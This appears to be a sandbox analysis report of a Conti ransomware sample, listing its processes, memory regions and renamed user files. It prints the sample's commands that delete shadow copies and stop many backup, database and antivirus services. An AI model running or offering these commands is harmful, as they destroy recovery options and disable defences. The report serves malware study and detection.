C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop RESvc /y
C:\Windows\SysWOW64\net.exe
net stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop sacsvr /y
C:\Windows\SysWOW64\net.exe
net stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SamSs /y
C:\Windows\SysWOW64\net.exe
net stop SamSs /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
net stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SAVService /y
C:\Windows\SysWOW64\net.exe
net stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
net stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
net stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
net stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop Smcinst /y
C:\Windows\SysWOW64\net.exe
net stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SmcService /y
C:\Windows\SysWOW64\net.exe
net stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
net stop SMTPSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
net stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
net stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
net stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLWriter /y
C:\Windows\SysWOW64\net.exe
net stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
net stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamMountSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamMountSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop W3Svc /y
C:\Windows\SysWOW64\net.exe
net stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop WRSVC /y
C:\Windows\SysWOW64\net.exe
net stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop swi_update /y
C:\Windows\SysWOW64\net.exe
net stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQL Backups" /y
C:\Windows\SysWOW64\net.exe
net stop "SQL Backups" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop msftesql$PROD /y
C:\Windows\SysWOW64\net.exe
net stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EhttpSrv /y
C:\Windows\SysWOW64\net.exe
net stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ekrn /y
C:\Windows\SysWOW64\net.exe
net stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
net stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AVP /y
C:\Windows\SysWOW64\net.exe
net stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop klnagent /y
C:\Windows\SysWOW64\net.exe
net stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfefire /y
C:\Windows\SysWOW64\net.exe
net stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
Network
Files
memory/1304-54-0x0000000076451000-0x0000000076453000-memory.dmp
memory/1676-55-0x0000000000000000-mapping.dmp
memory/964-56-0x0000000000000000-mapping.dmp
memory/1328-57-0x0000000000000000-mapping.dmp
memory/1648-58-0x0000000000000000-mapping.dmp
memory/268-59-0x0000000000000000-mapping.dmp
memory/688-60-0x0000000000000000-mapping.dmp
memory/1136-61-0x0000000000000000-mapping.dmp
memory/836-62-0x0000000000000000-mapping.dmp
memory/1532-63-0x0000000000000000-mapping.dmp
memory/1496-64-0x0000000000000000-mapping.dmp
memory/1636-65-0x0000000000000000-mapping.dmp
memory/596-66-0x0000000000000000-mapping.dmp
memory/1196-67-0x0000000000000000-mapping.dmp
memory/1072-68-0x0000000000000000-mapping.dmp
memory/1036-69-0x0000000000000000-mapping.dmp
memory/308-70-0x0000000000000000-mapping.dmp
memory/292-71-0x0000000000000000-mapping.dmp
memory/540-72-0x0000000000000000-mapping.dmp
memory/1744-73-0x0000000000000000-mapping.dmp
memory/920-74-0x0000000000000000-mapping.dmp
memory/1232-75-0x0000000000000000-mapping.dmp
memory/1208-76-0x0000000000000000-mapping.dmp
memory/2024-77-0x0000000000000000-mapping.dmp
memory/324-78-0x0000000000000000-mapping.dmp
memory/524-79-0x0000000000000000-mapping.dmp
memory/1548-80-0x0000000000000000-mapping.dmp
memory/396-81-0x0000000000000000-mapping.dmp
memory/1988-82-0x0000000000000000-mapping.dmp
memory/864-83-0x0000000000000000-mapping.dmp
memory/1476-84-0x0000000000000000-mapping.dmp
memory/1672-85-0x0000000000000000-mapping.dmp
memory/1840-86-0x0000000000000000-mapping.dmp
memory/1492-87-0x0000000000000000-mapping.dmp
memory/636-88-0x0000000000000000-mapping.dmp
memory/1392-89-0x0000000000000000-mapping.dmp
memory/884-90-0x0000000000000000-mapping.dmp
memory/1764-91-0x0000000000000000-mapping.dmp
memory/780-92-0x0000000000000000-mapping.dmp
memory/828-93-0x0000000000000000-mapping.dmp
memory/300-94-0x0000000000000000-mapping.dmp
memory/704-95-0x0000000000000000-mapping.dmp
memory/748-96-0x0000000000000000-mapping.dmp
memory/1556-97-0x0000000000000000-mapping.dmp
memory/964-98-0x0000000000000000-mapping.dmp
memory/976-99-0x0000000000000000-mapping.dmp
memory/1744-100-0x0000000000000000-mapping.dmp
memory/692-101-0x0000000000000000-mapping.dmp
memory/1660-102-0x0000000000000000-mapping.dmp
memory/1908-103-0x0000000000000000-mapping.dmp
memory/1648-104-0x0000000000000000-mapping.dmp
memory/1232-105-0x0000000000000000-mapping.dmp
memory/1456-106-0x0000000000000000-mapping.dmp
memory/676-107-0x0000000000000000-mapping.dmp
memory/324-108-0x0000000000000000-mapping.dmp
memory/1132-109-0x0000000000000000-mapping.dmp
memory/1812-110-0x0000000000000000-mapping.dmp
memory/1316-111-0x0000000000000000-mapping.dmp
memory/1408-112-0x0000000000000000-mapping.dmp
memory/1780-113-0x0000000000000000-mapping.dmp
memory/1292-114-0x0000000000000000-mapping.dmp
memory/2008-115-0x0000000000000000-mapping.dmp
memory/396-116-0x0000000000000000-mapping.dmp
memory/1560-117-0x0000000000000000-mapping.dmp
memory/1672-118-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-09 15:19
Reported
2022-05-09 15:21
Platform
win10v2004-20220414-en
Max time kernel
129s
Max time network
136s
Command Line
Signatures
Conti Ransomware
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\ConvertClear.crw => C:\Users\Admin\Pictures\ConvertClear.crw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FindInitialize.png => C:\Users\Admin\Pictures\FindInitialize.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StartConvertFrom.tiff => C:\Users\Admin\Pictures\StartConvertFrom.tiff.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertExpand.tif => C:\Users\Admin\Pictures\AssertExpand.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\BackupResize.tif => C:\Users\Admin\Pictures\BackupResize.tif.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideDisable.png => C:\Users\Admin\Pictures\HideDisable.png.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchAssert.raw => C:\Users\Admin\Pictures\WatchAssert.raw.CONTI | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StartConvertFrom.tiff | C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe | N/A |
Drops desktop.ini file(s)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe
"C:\Users\Admin\AppData\Local\Temp\1ef1ff8b1e81815d13bdd293554ddf8b3e57490dd3ef4add7c2837ddc67f9c24.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\net.exe
net stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\net.exe
net stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
net stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop Antivirus /y
C:\Windows\SysWOW64\net.exe
net stop Antivirus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ARSM /y
C:\Windows\SysWOW64\net.exe
net stop ARSM /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
net stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop bedbg /y
C:\Windows\SysWOW64\net.exe
net stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\cmd.exe
